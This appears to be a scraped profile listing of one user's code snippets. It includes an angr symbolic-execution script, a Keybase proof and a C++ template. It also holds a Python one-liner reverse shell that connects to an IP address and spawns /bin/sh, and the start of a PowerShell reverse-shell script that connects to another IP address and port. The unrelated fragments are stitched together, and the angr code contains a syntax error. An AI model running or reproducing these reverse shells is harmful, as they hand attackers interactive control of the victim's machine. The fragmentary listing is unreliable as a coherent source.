Es7evam

import angr

p = angr.Project("./not_malware", preload_libs='./bypass.so')
s = p.factory.entry_state()

# Entrada = Input
entrada = s.solver.BVS("input", 480)
s = p.factory.entry_state(stdin=entrada)

s = p.factory.full_init_state(args=['./not_malware')

Es7evam

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.133.80.110",4448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Es7evam

Keybase proof

I hereby claim:

• I am es7evam on github.
• I am es7evam (https://keybase.io/es7evam) on keybase.
• I have a public key ASBKOgACog6MGx94B66Z_O4FcqhwbCr9sIBJUjgVsQcgKgo

To claim this, I am signing this object:

Es7evam

#include <bits/stdc++.h>

using namespace std;

#define mk make_pair
#define pb push_back
#define fi first
#define se second

typedef pair<int, int> ii;

Es7evam

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
Setup IPADDR
$address = '167.99.9.30'
Setup PORT
$port = '6789'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)